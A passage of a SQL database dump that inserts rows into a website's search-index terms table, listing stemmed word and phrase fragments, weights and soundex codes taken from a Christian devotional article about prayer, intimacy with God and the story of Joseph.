(301028, 'destiny with', 'destini with', 0, 1, 1.4, 'D2353', 1, '*'),
(301029, 'destiny with god\'s', 'destini with god', 0, 1, 1.6, 'D2353232', 1, '*'),
(301030, 'discerning', 'discern', 0, 0, 0.6667, 'D2652', 1, '*'),
(301031, 'discerning and', 'discern and', 0, 1, 1.4667, 'D265253', 1, '*'),
(301032, 'discerning and a', 'discern and a', 0, 1, 1.5333, 'D265253', 1, '*'),
(301033, 'discipline yield', 'disciplin yield', 0, 1, 1.5333, 'D214543', 1, '*'),
(301034, 'discipline yield to', 'disciplin yield to', 0, 1, 1.6333, 'D214543', 1, '*'),
(301035, 'divine advantage', 'divin advantage', 0, 1, 1.5333, 'D1531532', 1, '*'),
(301036, 'divine advantage acts', 'divin advantage acts', 0, 1, 1.7, 'D153153232', 1, '*'),
(301037, 'divine instructions don\'t', 'divin instructions don', 0, 1, 1.8333, 'D152362352353', 1, '*'),
(301038, 'do and work', 'do and work', 0, 1, 1.3667, 'D5362', 1, '*'),
(301039, 'do it for', 'do it for', 0, 1, 1.3, 'D160', 1, '*'),
(301040, 'do it yourself', 'do it yourself', 0, 1, 1.4667, 'D6241', 1, '*'),
(301041, 'do these and', 'do these and', 0, 1, 1.4, 'D253', 1, '*'),
(301042, 'does against', 'doe against', 0, 1, 1.4, 'D2523', 1, '*'),
(301043, 'does against you', 'doe against you', 0, 1, 1.5333, 'D2523', 1, '*'),
(301044, 'don\'t come', 'don come', 0, 1, 1.3333, 'D5325', 1, '*'),
(301045, 'don\'t come to', 'don come to', 0, 1, 1.4333, 'D53253', 1, '*'),
(301046, 'don\'t consider', 'don consider', 0, 1, 1.4667, 'D5325236', 1, '*'),
(301047, 'don\'t consider the', 'don consider the', 0, 1, 1.6, 'D53252363', 1, '*'),
(301048, 'don\'t look', 'don look', 0, 1, 1.3333, 'D5342', 1, '*'),
(301049, 'don\'t look at', 'don look at', 0, 1, 1.4333, 'D53423', 1, '*'),
(301050, 'don\'t lose', 'don lose', 0, 1, 1.3333, 'D5342', 1, '*'),
(301051, 'don\'t lose your', 'don lose your', 0, 1, 1.5, 'D53426', 1, '*'),
(301052, 'draw near', 'draw near', 0, 1, 1.3, 'D656', 1, '*'),
(301053, 'draw near to', 'draw near to', 0, 1, 1.4, 'D6563', 1, '*'),
(301054, 'egypt but god', 'egypt but god', 0, 1, 1.4333, 'E2131323', 1, '*'),
(301055, 'egypt when', 'egypt when', 0, 1, 1.3333, 'E2135', 1, '*'),
(301056, 'egypt when no', 'egypt when no', 0, 1, 1.4333, 'E2135', 1, '*'),
(301057, 'envious', 'enviou', 0, 0, 0.4667, 'E512', 1, '*'),
(301058, 'envious sold', 'enviou sold', 0, 1, 1.4, 'E51243', 1, '*'),
(301059, 'envious sold joseph', 'enviou sold joseph', 0, 1, 1.6333, 'E5124321', 1, '*'),
(301060, 'even if there', 'even if there', 0, 1, 1.4333, 'E15136', 1, '*'),
(301061, 'even in relationships', 'even in relationships', 0, 1, 1.7, 'E156435212', 1, '*'),
(301062, 'experiencehim', 'experiencehim', 0, 0, 0.8667, 'E216525', 1, '*'),
(301063, 'experiencehim draw', 'experiencehim draw', 0, 1, 1.6, 'E21652536', 1, '*'),
(301064, 'experiencehim draw closer', 'experiencehim draw closer', 0, 1, 1.8333, 'E216525362426', 1, '*'),
(301065, 'experiences of the', 'experi of the', 0, 1, 1.6, 'E2165213', 1, '*'),
(301066, 'fact all', 'fact all', 0, 1, 1.2667, 'F234', 1, '*'),
(301067, 'fact all were', 'fact all were', 0, 1, 1.4333, 'F2346', 1, '*'),
(301068, 'fact god', 'fact god', 0, 1, 1.2667, 'F2323', 1, '*'),
(301069, 'fact god has', 'fact god has', 0, 1, 1.4, 'F23232', 1, '*'),
(301070, 'fail even', 'fail even', 0, 1, 1.3, 'F415', 1, '*'),
(301071, 'fail even in', 'fail even in', 0, 1, 1.4, 'F415', 1, '*'),
(301072, 'fantastic', 'fantast', 0, 0, 0.6, 'F53232', 1, '*'),
(301073, 'fantastic cathedral', 'fantast cathedral', 0, 1, 1.6333, 'F53232364', 1, '*'),
(301074, 'fantastic cathedral but', 'fantast cathedral but', 0, 1, 1.7667, 'F5323236413', 1, '*'),
(301075, 'father\'s heart 16', 'father heart 16', 0, 1, 1.5667, 'F36263', 2, '*'),
(301076, 'fill', 'fill', 0, 0, 0.2667, 'F400', 1, '*'),
(301077, 'fill your', 'fill your', 0, 1, 1.3, 'F460', 1, '*'),
(301078, 'fill your spirit', 'fill your spirit', 0, 1, 1.5333, 'F462163', 1, '*'),
(301079, 'first to', 'first to', 0, 1, 1.2667, 'F623', 1, '*'),
(301080, 'first to correct', 'first to correct', 0, 1, 1.5333, 'F6232623', 1, '*'),
(301081, 'flee anything', 'flee anything', 0, 1, 1.4333, 'F45352', 1, '*'),
(301082, 'flee anything that', 'flee anything that', 0, 1, 1.6, 'F453523', 1, '*'),
(301083, 'flesh shall', 'flesh shall', 0, 1, 1.3667, 'F424', 1, '*'),
(301084, 'flesh shall fail', 'flesh shall fail', 0, 1, 1.5333, 'F42414', 1, '*'),
(301085, 'for battle', 'for battle', 0, 1, 1.3333, 'F6134', 1, '*'),
(301086, 'for battle the', 'for battle the', 0, 1, 1.4667, 'F61343', 1, '*'),
(301087, 'for you you', 'for you you', 0, 1, 1.3667, 'F600', 1, '*'),
(301088, 'from god iniquity', 'from god iniquity', 0, 1, 1.5667, 'F6523523', 1, '*'),
(301089, 'get don\'t', 'get don', 0, 1, 1.3, 'G353', 1, '*'),
(301090, 'get don\'t lose', 'get don lose', 0, 1, 1.4667, 'G35342', 1, '*'),
(301091, 'get to a', 'get to a', 0, 1, 1.2667, 'G300', 1, '*'),
(301092, 'ghost 2', 'ghost 2', 0, 1, 1.2333, 'G300', 1, '*'),
(301093, 'ghost 2 let', 'ghost 2 let', 0, 1, 1.3667, 'G343', 1, '*'),
(301094, 'god be with', 'god be with', 0, 1, 1.3667, 'G313', 1, '*'),
(301095, 'god fill', 'god fill', 0, 1, 1.2667, 'G314', 1, '*'),
(301096, 'god fill your', 'god fill your', 0, 1, 1.4333, 'G3146', 1, '*'),
(301097, 'god has put', 'god has put', 0, 1, 1.3667, 'G3213', 1, '*'),
(301098, 'god iniquity', 'god iniquity', 0, 1, 1.4, 'G3523', 1, '*'),
(301099, 'god iniquity and', 'god iniquity and', 0, 1, 1.5333, 'G352353', 1, '*'),
(301100, 'god lighten', 'god lighten', 0, 1, 1.3667, 'G34235', 1, '*'),
(301101, 'god lighten your', 'god lighten your', 0, 1, 1.5333, 'G342356', 1, '*'),
(301102, 'god no', 'god no', 0, 1, 1.2, 'G350', 1, '*'),
(301103, 'god no matter', 'god no matter', 0, 1, 1.4333, 'G3536', 1, '*'),
(301104, 'god that\'s', 'god that', 0, 1, 1.3333, 'G320', 1, '*'),
(301105, 'god that\'s what', 'god that what', 0, 1, 1.5, 'G323', 1, '*'),
(301106, 'god was with', 'god was with', 0, 1, 1.4, 'G323', 1, '*'),
(301107, 'god with you', 'god with you', 0, 1, 1.4, 'G300', 1, '*'),
(301108, 'god you will', 'god you will', 0, 1, 1.4, 'G340', 3, '*'),
(301109, 'god\'s help', 'god help', 0, 1, 1.3333, 'G3241', 1, '*'),
(301110, 'god\'s help only', 'god help only', 0, 1, 1.5, 'G324154', 1, '*'),
(301111, 'guarantees you', 'guarante you', 0, 1, 1.4667, 'G6532', 1, '*'),
(301112, 'guarantees you a', 'guarante you a', 0, 1, 1.5333, 'G6532', 1, '*'),
(301113, 'hard work', 'hard work', 0, 1, 1.3, 'H6362', 1, '*'),
(301114, 'hard work alone', 'hard work alone', 0, 1, 1.5, 'H636245', 1, '*'),
(301115, 'has put', 'ha put', 0, 1, 1.2333, 'H213', 1, '*'),
(301116, 'has put a', 'ha put a', 0, 1, 1.3, 'H213', 1, '*'),
(301117, 'hatred', 'hatr', 0, 0, 0.4, 'H363', 1, '*'),
(301118, 'hatred of', 'hatr of', 0, 1, 1.3, 'H3631', 1, '*'),
(301119, 'hatred of man', 'hatr of man', 0, 1, 1.4333, 'H36315', 1, '*'),
(301120, 'have but', 'have but', 0, 1, 1.2667, 'H130', 2, '*'),
(301121, 'have but consider', 'have but consider', 0, 1, 1.5667, 'H1325236', 1, '*'),
(301122, 'he adds', 'he adds', 0, 1, 1.2333, 'H320', 1, '*'),
(301123, 'he adds no', 'he adds no', 0, 1, 1.3333, 'H325', 1, '*'),
(301124, 'he corrects', 'he corrects', 0, 1, 1.3667, 'H26232', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(301125, 'he corrects you', 'he corrects you', 0, 1, 1.5, 'H26232', 1, '*'),
(301126, 'heart 16', 'heart 16', 0, 1, 1.2667, 'H630', 2, '*'),
(301127, 'heart 16 04', 'heart 16 04', 0, 1, 1.3667, 'H630', 1, '*'),
(301128, 'help in', 'help in', 0, 1, 1.2333, 'H415', 1, '*'),
(301129, 'help in fact', 'help in fact', 0, 1, 1.4, 'H415123', 1, '*'),
(301130, 'help isa', 'help isa', 0, 1, 1.2667, 'H412', 1, '*'),
(301131, 'help isa 30', 'help isa 30', 0, 1, 1.3667, 'H412', 1, '*'),
(301132, 'help of', 'help of', 0, 1, 1.2333, 'H410', 1, '*'),
(301133, 'help of the', 'help of the', 0, 1, 1.3667, 'H413', 1, '*'),
(301134, 'help only', 'help only', 0, 1, 1.3, 'H4154', 1, '*'),
(301135, 'help only even', 'help only even', 0, 1, 1.4667, 'H415415', 1, '*'),
(301136, 'help you can\'t', 'help you can', 0, 1, 1.4667, 'H41253', 1, '*'),
(301137, 'him but one', 'him but one', 0, 1, 1.3667, 'H5135', 1, '*'),
(301138, 'him in fact', 'him in fact', 0, 1, 1.3667, 'H5123', 1, '*'),
(301139, 'him the presence', 'him the presence', 0, 1, 1.5333, 'H5316252', 1, '*'),
(301140, 'him through', 'him through', 0, 1, 1.3667, 'H5362', 1, '*'),
(301141, 'him through prayer', 'him through prayer', 0, 1, 1.6, 'H536216', 1, '*'),
(301142, 'his help isa', 'hi help isa', 0, 1, 1.4, 'H2412', 1, '*'),
(301143, 'his word with', 'hi word with', 0, 1, 1.4333, 'H263', 1, '*'),
(301144, 'holy ghost 2', 'holi ghost 2', 0, 1, 1.4, 'H423', 1, '*'),
(301145, 'holy spirit as', 'holi spirit as', 0, 1, 1.4667, 'H421632', 1, '*'),
(301146, 'holy spirit comes', 'holi spirit comes', 0, 1, 1.5667, 'H42163252', 1, '*'),
(301147, 'holy spirit it', 'holi spirit it', 0, 1, 1.4667, 'H42163', 1, '*'),
(301148, 'how busy', 'how busy', 0, 1, 1.2667, 'H120', 1, '*'),
(301149, 'how busy you', 'how busy you', 0, 1, 1.4, 'H120', 1, '*'),
(301150, 'human help', 'human help', 0, 1, 1.3333, 'H541', 1, '*'),
(301151, 'human help in', 'human help in', 0, 1, 1.4333, 'H5415', 1, '*'),
(301152, 'human help you', 'human help you', 0, 1, 1.4667, 'H541', 1, '*'),
(301153, 'in egypt when', 'in egypt when', 0, 1, 1.4333, 'I52135', 1, '*'),
(301154, 'in fact', 'in fact', 0, 1, 1.2333, 'I5123', 1, '*'),
(301155, 'in fact all', 'in fact all', 0, 1, 1.3667, 'I51234', 1, '*'),
(301156, 'in fact god', 'in fact god', 0, 1, 1.3667, 'I512323', 1, '*'),
(301157, 'in life intimacy', 'in life intimacy', 0, 1, 1.5333, 'I5415352', 1, '*'),
(301158, 'in relationships', 'in relationships', 0, 1, 1.5333, 'I56435212', 1, '*'),
(301159, 'in relationships don\'t', 'in relationships don', 0, 1, 1.7333, 'I56435212353', 1, '*'),
(301160, 'in the experiences', 'in the experiences', 0, 1, 1.6, 'I5321652', 1, '*'),
(301161, 'iniquity', 'iniqu', 0, 0, 0.5333, 'I523', 1, '*'),
(301162, 'iniquity and', 'iniqu and', 0, 1, 1.4, 'I52353', 1, '*'),
(301163, 'iniquity and rebellion', 'iniqu and rebellion', 0, 1, 1.7333, 'I523536145', 1, '*'),
(301164, 'instructions don\'t', 'instruct don', 0, 1, 1.6, 'I52362352353', 1, '*'),
(301165, 'instructions don\'t come', 'instruct don come', 0, 1, 1.7667, 'I5236235235325', 1, '*'),
(301166, 'intimacy and', 'intimaci and', 0, 1, 1.4, 'I535253', 1, '*'),
(301167, 'intimacy and flee', 'intimaci and flee', 0, 1, 1.5667, 'I53525314', 1, '*'),
(301168, 'intimacy is', 'intimaci is', 0, 1, 1.3667, 'I5352', 1, '*'),
(301169, 'intimacy is personal', 'intimaci is personal', 0, 1, 1.6667, 'I535216254', 1, '*'),
(301170, 'intimacy is self-generated', 'intimaci is self-generated', 0, 1, 1.8667, 'I5352412563', 1, '*'),
(301171, 'intimacy with god', 'intimaci with god', 0, 1, 1.5667, 'I5352323', 1, '*'),
(301172, 'intimacy with him', 'intimaci with him', 0, 1, 1.5667, 'I535235', 1, '*'),
(301173, 'into egypt', 'into egypt', 0, 1, 1.3333, 'I53213', 1, '*'),
(301174, 'into egypt but', 'into egypt but', 0, 1, 1.4667, 'I5321313', 1, '*'),
(301175, 'is coming from', 'is coming from', 0, 1, 1.4667, 'I252165', 1, '*'),
(301176, 'is no human', 'is no human', 0, 1, 1.3667, 'I250', 1, '*'),
(301177, 'is not by', 'is not by', 0, 1, 1.3, 'I2531', 1, '*'),
(301178, 'is our divine', 'is our divine', 0, 1, 1.4333, 'I26315', 1, '*'),
(301179, 'is personal', 'is personal', 0, 1, 1.3667, 'I216254', 1, '*'),
(301180, 'is personal though', 'is personal though', 0, 1, 1.6, 'I21625432', 1, '*'),
(301181, 'is self-cultivated', 'is self-cultivated', 0, 1, 1.6, 'I24124313', 1, '*'),
(301182, 'is self-cultivated and', 'is self-cultivated and', 0, 1, 1.7333, 'I2412431353', 1, '*'),
(301183, 'is self-generated', 'is self-generated', 0, 1, 1.5667, 'I2412563', 1, '*'),
(301184, 'is self-generated no', 'is self-generated no', 0, 1, 1.6667, 'I24125635', 1, '*'),
(301185, 'is so', 'is so', 0, 1, 1.1667, 'I200', 1, '*'),
(301186, 'is so vital', 'is so vital', 0, 1, 1.3667, 'I2134', 1, '*'),
(301187, 'is the majority', 'is the majority', 0, 1, 1.5, 'I235263', 1, '*'),
(301188, 'is with', 'is with', 0, 1, 1.2333, 'I230', 1, '*'),
(301189, 'is with them', 'is with them', 0, 1, 1.4, 'I235', 1, '*'),
(301190, 'isa', 'isa', 0, 0, 0.2, 'I200', 1, '*'),
(301191, 'isa 30', 'isa 30', 0, 1, 1.2, 'I200', 1, '*'),
(301192, 'isa 30 1', 'isa 30 1', 0, 1, 1.2667, 'I200', 1, '*'),
(301193, 'it as you', 'it as you', 0, 1, 1.3, 'I320', 1, '*'),
(301194, 'it for you', 'it for you', 0, 1, 1.3333, 'I316', 1, '*'),
(301195, 'it in life', 'it in life', 0, 1, 1.3333, 'I3541', 1, '*'),
(301196, 'it is self-cultivated', 'it is self-cultivated', 0, 1, 1.7, 'I324124313', 1, '*'),
(301197, 'it the lord', 'it the lord', 0, 1, 1.3667, 'I3463', 1, '*'),
(301198, 'it yourself', 'it yourself', 0, 1, 1.3667, 'I36241', 1, '*'),
(301199, 'it yourself it', 'it yourself it', 0, 1, 1.4667, 'I362413', 1, '*'),
(301200, 'item 43', 'item 43', 0, 1, 1.2333, 'I350', 1, '*'),
(301201, 'item 43 from', 'item 43 from', 0, 1, 1.4, 'I35165', 1, '*'),
(301202, 'jesus intimacy', 'jesu intimacy', 0, 1, 1.4667, 'J5352', 1, '*'),
(301203, 'jesus intimacy with', 'jesu intimacy with', 0, 1, 1.6333, 'J53523', 1, '*'),
(301204, 'joke with', 'joke with', 0, 1, 1.3, 'J300', 1, '*'),
(301205, 'joke with your', 'joke with your', 0, 1, 1.4667, 'J360', 1, '*'),
(301206, 'joseph in', 'joseph in', 0, 1, 1.3, 'J150', 1, '*'),
(301207, 'joseph in egypt', 'joseph in egypt', 0, 1, 1.5, 'J15213', 1, '*'),
(301208, 'joseph into', 'joseph into', 0, 1, 1.3667, 'J153', 1, '*'),
(301209, 'joseph into egypt', 'joseph into egypt', 0, 1, 1.5667, 'J153213', 1, '*'),
(301210, 'k2 item 43', 'k2 item 43', 0, 1, 1.3333, 'K350', 1, '*'),
(301211, 'keep intimacy', 'keep intimacy', 0, 1, 1.4333, 'K15352', 1, '*'),
(301212, 'keep intimacy and', 'keep intimacy and', 0, 1, 1.5667, 'K1535253', 1, '*'),
(301213, 'keep your', 'keep your', 0, 1, 1.3, 'K160', 3, '*'),
(301214, 'keep your time', 'keep your time', 0, 1, 1.4667, 'K1635', 1, '*'),
(301215, 'last with', 'last with', 0, 1, 1.3, 'L230', 1, '*'),
(301216, 'last with mere', 'last with mere', 0, 1, 1.4667, 'L2356', 1, '*'),
(301217, 'let god lighten', 'let god lighten', 0, 1, 1.5, 'L3234235', 1, '*'),
(301218, 'let the word', 'let the word', 0, 1, 1.4, 'L363', 1, '*'),
(301219, 'let your mouth', 'let your mouth', 0, 1, 1.4667, 'L3653', 1, '*'),
(301220, 'life intimacy', 'life intimacy', 0, 1, 1.4333, 'L15352', 1, '*'),
(301221, 'life intimacy is', 'life intimacy is', 0, 1, 1.5333, 'L15352', 1, '*'),
(301222, 'light is', 'light is', 0, 1, 1.2667, 'L232', 1, '*'),
(301223, 'light is coming', 'light is coming', 0, 1, 1.5, 'L23252', 1, '*'),
(301224, 'light to', 'light to', 0, 1, 1.2667, 'L230', 1, '*'),
(301225, 'light to your', 'light to your', 0, 1, 1.4333, 'L236', 1, '*'),
(301226, 'lighten', 'lighten', 0, 0, 0.4667, 'L235', 1, '*'),
(301227, 'lighten your', 'lighten your', 0, 1, 1.4, 'L2356', 1, '*'),
(301228, 'lighten your candle', 'lighten your candle', 0, 1, 1.6333, 'L23562534', 1, '*'),
(301229, 'living in the', 'live in the', 0, 1, 1.4333, 'L15253', 1, '*'),
(301230, 'loads', 'load', 0, 0, 0.3333, 'L320', 1, '*'),
(301231, 'loads up', 'load up', 0, 1, 1.2667, 'L321', 1, '*'),
(301232, 'loads up your', 'load up your', 0, 1, 1.4333, 'L3216', 1, '*'),
(301233, 'lord is our', 'lord is our', 0, 1, 1.3667, 'L6326', 1, '*'),
(301234, 'lord is so', 'lord is so', 0, 1, 1.3333, 'L632', 1, '*'),
(301235, 'lord makes', 'lord makes', 0, 1, 1.3333, 'L6352', 1, '*'),
(301236, 'lord makes one', 'lord makes one', 0, 1, 1.4667, 'L63525', 1, '*'),
(301237, 'lord was', 'lord was', 0, 1, 1.2667, 'L632', 1, '*'),
(301238, 'lord was with', 'lord was with', 0, 1, 1.4333, 'L6323', 1, '*'),
(301239, 'lose your', 'lose your', 0, 1, 1.3, 'L260', 1, '*'),
(301240, 'lose your time', 'lose your time', 0, 1, 1.4667, 'L2635', 1, '*'),
(301241, 'majority let', 'major let', 0, 1, 1.4, 'M26343', 1, '*'),
(301242, 'majority let god', 'major let god', 0, 1, 1.5333, 'M2634323', 1, '*'),
(301243, 'make it in', 'make it in', 0, 1, 1.3333, 'M235', 1, '*'),
(301244, 'makes it as', 'make it as', 0, 1, 1.3667, 'M232', 1, '*'),
(301245, 'makes man', 'make man', 0, 1, 1.3, 'M250', 1, '*'),
(301246, 'makes man his', 'make man his', 0, 1, 1.4333, 'M252', 1, '*'),
(301247, 'makes one', 'make one', 0, 1, 1.3, 'M250', 1, '*'),
(301248, 'makes one rich', 'make one rich', 0, 1, 1.4667, 'M2562', 1, '*'),
(301249, 'making you', 'make you', 0, 1, 1.3333, 'M252', 2, '*'),
(301250, 'making you ready', 'make you ready', 0, 1, 1.5333, 'M25263', 1, '*'),
(301251, 'man does', 'man does', 0, 1, 1.2667, 'M320', 1, '*'),
(301252, 'man does against', 'man does against', 0, 1, 1.5333, 'M32523', 1, '*'),
(301253, 'man his help', 'man his help', 0, 1, 1.4, 'M241', 1, '*'),
(301254, 'man makes', 'man makes', 0, 1, 1.3, 'M200', 1, '*'),
(301255, 'man makes it', 'man makes it', 0, 1, 1.4, 'M230', 1, '*'),
(301256, 'man or', 'man or', 0, 1, 1.2, 'M600', 1, '*'),
(301257, 'man or anything', 'man or anything', 0, 1, 1.5, 'M65352', 1, '*'),
(301258, 'man that makes', 'man that makes', 0, 1, 1.4667, 'M352', 1, '*'),
(301259, 'man\'s soul', 'man soul', 0, 1, 1.3333, 'M240', 1, '*'),
(301260, 'man\'s soul yield', 'man soul yield', 0, 1, 1.5333, 'M243', 1, '*'),
(301261, 'mastery', 'masteri', 0, 0, 0.4667, 'M236', 1, '*'),
(301262, 'mastery of', 'masteri of', 0, 1, 1.3333, 'M2361', 1, '*'),
(301263, 'mastery of the', 'masteri of the', 0, 1, 1.4667, 'M23613', 1, '*'),
(301264, 'matter how', 'matter how', 0, 1, 1.3333, 'M360', 1, '*'),
(301265, 'matter how busy', 'matter how busy', 0, 1, 1.5, 'M3612', 1, '*'),
(301266, 'mere', 'mere', 0, 0, 0.2667, 'M600', 1, '*'),
(301267, 'mere human', 'mere human', 0, 1, 1.3333, 'M650', 1, '*'),
(301268, 'mere human help', 'mere human help', 0, 1, 1.5, 'M6541', 1, '*'),
(301269, 'mouth be cold', 'mouth be cold', 0, 1, 1.4333, 'M31243', 1, '*'),
(301270, 'must do', 'must do', 0, 1, 1.2333, 'M230', 1, '*'),
(301271, 'must do it', 'must do it', 0, 1, 1.3333, 'M230', 1, '*'),
(301272, 'near', 'near', 0, 0, 0.2667, 'N600', 1, '*'),
(301273, 'near to', 'near to', 0, 1, 1.2333, 'N630', 1, '*'),
(301274, 'near to god', 'near to god', 0, 1, 1.3667, 'N6323', 1, '*'),
(301275, 'never joke', 'never joke', 0, 1, 1.3333, 'N162', 1, '*'),
(301276, 'never joke with', 'never joke with', 0, 1, 1.5, 'N1623', 1, '*'),
(301277, 'no human', 'no human', 0, 1, 1.2667, 'N000', 1, '*'),
(301278, 'no human help', 'no human help', 0, 1, 1.4333, 'N410', 1, '*'),
(301279, 'no light', 'no light', 0, 1, 1.2667, 'N423', 1, '*'),
(301280, 'no light is', 'no light is', 0, 1, 1.3667, 'N4232', 1, '*'),
(301281, 'no matter how', 'no matter how', 0, 1, 1.4333, 'N360', 1, '*'),
(301282, 'no one', 'no one', 0, 1, 1.2, 'N000', 1, '*'),
(301283, 'no one can', 'no one can', 0, 1, 1.3333, 'N250', 1, '*'),
(301284, 'no one was', 'no one was', 0, 1, 1.3333, 'N200', 1, '*'),
(301285, 'no sorrow', 'no sorrow', 0, 1, 1.3, 'N260', 1, '*'),
(301286, 'no sorrow with', 'no sorrow with', 0, 1, 1.4667, 'N263', 1, '*'),
(301287, 'not by hard', 'not by hard', 0, 1, 1.3667, 'N3163', 1, '*'),
(301288, 'of discerning', 'of discerning', 0, 1, 1.4333, 'O132652', 1, '*'),
(301289, 'of discerning and', 'of discerning and', 0, 1, 1.5667, 'O13265253', 1, '*'),
(301290, 'of flesh shall', 'of flesh shall', 0, 1, 1.4667, 'O1424', 1, '*'),
(301291, 'of god fill', 'of god fill', 0, 1, 1.3667, 'O12314', 1, '*'),
(301292, 'of man or', 'of man or', 0, 1, 1.3, 'O156', 1, '*'),
(301293, 'of the believer', 'of the believer', 0, 1, 1.5, 'O131416', 1, '*'),
(301294, 'of the scriptures', 'of the scriptures', 0, 1, 1.5667, 'O13261362', 1, '*'),
(301295, 'on a man', 'on a man', 0, 1, 1.2667, 'O500', 1, '*'),
(301296, 'one can', 'on can', 0, 1, 1.2333, 'O525', 1, '*'),
(301297, 'one can do', 'on can do', 0, 1, 1.3333, 'O5253', 1, '*'),
(301298, 'one rich', 'on rich', 0, 1, 1.2667, 'O562', 1, '*'),
(301299, 'one rich and', 'on rich and', 0, 1, 1.4, 'O56253', 1, '*'),
(301300, 'one was', 'on was', 0, 1, 1.2333, 'O520', 1, '*'),
(301301, 'one was with', 'on was with', 0, 1, 1.4, 'O523', 1, '*'),
(301302, 'one with', 'on with', 0, 1, 1.2667, 'O530', 1, '*'),
(301303, 'one with god', 'on with god', 0, 1, 1.4, 'O5323', 1, '*'),
(301304, 'only even', 'onli even', 0, 1, 1.3, 'O5415', 1, '*'),
(301305, 'only even if', 'onli even if', 0, 1, 1.4, 'O54151', 1, '*'),
(301306, 'or anything', 'or anything', 0, 1, 1.3667, 'O65352', 1, '*'),
(301307, 'or anything man', 'or anything man', 0, 1, 1.5, 'O653525', 1, '*'),
(301308, 'or divine', 'or divine', 0, 1, 1.3, 'O6315', 1, '*'),
(301309, 'or divine instructions', 'or divine instructions', 0, 1, 1.7333, 'O63152362352', 1, '*'),
(301310, 'or rebellious', 'or rebellious', 0, 1, 1.4333, 'O6142', 1, '*'),
(301311, 'or rebellious spirit', 'or rebellious spirit', 0, 1, 1.6667, 'O6142163', 1, '*'),
(301312, 'our divine', 'our divine', 0, 1, 1.3333, 'O6315', 1, '*'),
(301313, 'our divine advantage', 'our divine advantage', 0, 1, 1.6667, 'O631531532', 1, '*'),
(301314, 'patriarchs', 'patriarch', 0, 0, 0.6667, 'P362', 1, '*'),
(301315, 'patriarchs becoming', 'patriarch becoming', 0, 1, 1.6333, 'P3621252', 1, '*'),
(301316, 'patriarchs becoming envious', 'patriarch becoming envious', 0, 1, 1.9, 'P3621252512', 1, '*'),
(301317, 'people have', 'peopl have', 0, 1, 1.3667, 'P410', 1, '*'),
(301318, 'people have but', 'peopl have but', 0, 1, 1.5, 'P413', 1, '*'),
(301319, 'personal though', 'person though', 0, 1, 1.5, 'P625432', 1, '*'),
(301320, 'personal though available', 'person though available', 0, 1, 1.8333, 'P6254321414', 1, '*'),
(301321, 'personal worship', 'person worship', 0, 1, 1.5333, 'P6254621', 1, '*'),
(301322, 'personal worship keep', 'person worship keep', 0, 1, 1.7, 'P625462121', 1, '*'),
(301323, 'pray regularly', 'prai regularly', 0, 1, 1.4667, 'P62464', 1, '*'),
(301324, 'pray regularly in', 'prai regularly in', 0, 1, 1.5667, 'P624645', 1, '*'),
(301325, 'prayer and his', 'prayer and his', 0, 1, 1.4667, 'P6532', 1, '*'),
(301326, 'proverbs 10', 'proverb 10', 0, 1, 1.3667, 'P61612', 1, '*'),
(301327, 'proverbs 10 22', 'proverb 10 22', 0, 1, 1.4667, 'P61612', 1, '*'),
(301328, 'put a curse', 'put a curse', 0, 1, 1.3667, 'P3262', 1, '*'),
(301329, 'reading of', 'read of', 0, 1, 1.3333, 'R3521', 1, '*'),
(301330, 'reading of the', 'read of the', 0, 1, 1.4667, 'R35213', 1, '*'),
(301331, 'ready and', 'readi and', 0, 1, 1.3, 'R353', 1, '*'),
(301332, 'ready and strong', 'readi and strong', 0, 1, 1.5333, 'R35323652', 1, '*'),
(301333, 'realm 1', 'realm 1', 0, 1, 1.2333, 'R450', 1, '*'),
(301334, 'realm 1 pray', 'realm 1 pray', 0, 1, 1.4, 'R4516', 1, '*'),
(301335, 'realm do', 'realm do', 0, 1, 1.2667, 'R453', 1, '*'),
(301336, 'realm do and', 'realm do and', 0, 1, 1.4, 'R45353', 1, '*'),
(301337, 'rebellion brings', 'rebellion brings', 0, 1, 1.5333, 'R1451652', 1, '*'),
(301338, 'rebellion brings cloudiness', 'rebellion brings cloudiness', 0, 1, 1.9, 'R14516524352', 1, '*'),
(301339, 'rebellious spirit', 'rebelli spirit', 0, 1, 1.5667, 'R142163', 1, '*'),
(301340, 'rebellious spirit keep', 'rebelli spirit keep', 0, 1, 1.7333, 'R14216321', 1, '*'),
(301341, 'regular reading', 'regular reading', 0, 1, 1.5, 'R246352', 1, '*'),
(301342, 'regular reading of', 'regular reading of', 0, 1, 1.6, 'R2463521', 1, '*'),
(301343, 'regularly in', 'regularli in', 0, 1, 1.4, 'R24645', 1, '*'),
(301344, 'regularly in the', 'regularli in the', 0, 1, 1.5333, 'R246453', 1, '*'),
(301345, 'relationships don\'t', 'relationship don', 0, 1, 1.6333, 'R435212353', 1, '*'),
(301346, 'relationships don\'t look', 'relationship don look', 0, 1, 1.8, 'R43521235342', 1, '*'),
(301347, 'rich', 'rich', 0, 0, 0.2667, 'R200', 1, '*'),
(301348, 'rich and', 'rich and', 0, 1, 1.2667, 'R253', 1, '*'),
(301349, 'rich and he', 'rich and he', 0, 1, 1.3667, 'R253', 1, '*'),
(301350, 's heart 16', 's heart 16', 0, 1, 1.3333, 'S630', 1, '*'),
(301351, 'scriptures loads', 'scriptur loads', 0, 1, 1.5333, 'S61362432', 1, '*'),
(301352, 'scriptures loads up', 'scriptur loads up', 0, 1, 1.6333, 'S613624321', 1, '*'),
(301353, 'self-cultivated', 'self-cultiv', 0, 0, 1, 'S4124313', 1, '*'),
(301354, 'self-cultivated and', 'self-cultiv and', 0, 1, 1.6333, 'S412431353', 1, '*'),
(301355, 'self-cultivated and deliberate', 'self-cultiv and deliberate', 0, 1, 2, 'S4124313534163', 1, '*'),
(301356, 'self-generated', 'self-gener', 0, 0, 0.9333, 'S412563', 1, '*'),
(301357, 'self-generated no', 'self-gener no', 0, 1, 1.5667, 'S4125635', 1, '*'),
(301358, 'self-generated no one', 'self-gener no one', 0, 1, 1.7, 'S4125635', 1, '*'),
(301359, 'shall fail', 'shall fail', 0, 1, 1.3333, 'S414', 1, '*'),
(301360, 'shall fail even', 'shall fail even', 0, 1, 1.5, 'S41415', 1, '*'),
(301361, 'so vital', 'so vital', 0, 1, 1.2667, 'S134', 1, '*'),
(301362, 'so vital to', 'so vital to', 0, 1, 1.3667, 'S1343', 1, '*'),
(301363, 'sold', 'sold', 0, 0, 0.2667, 'S430', 2, '*'),
(301364, 'sold joseph', 'sold joseph', 0, 1, 1.3667, 'S4321', 1, '*'),
(301365, 'sold joseph into', 'sold joseph into', 0, 1, 1.5333, 'S432153', 1, '*'),
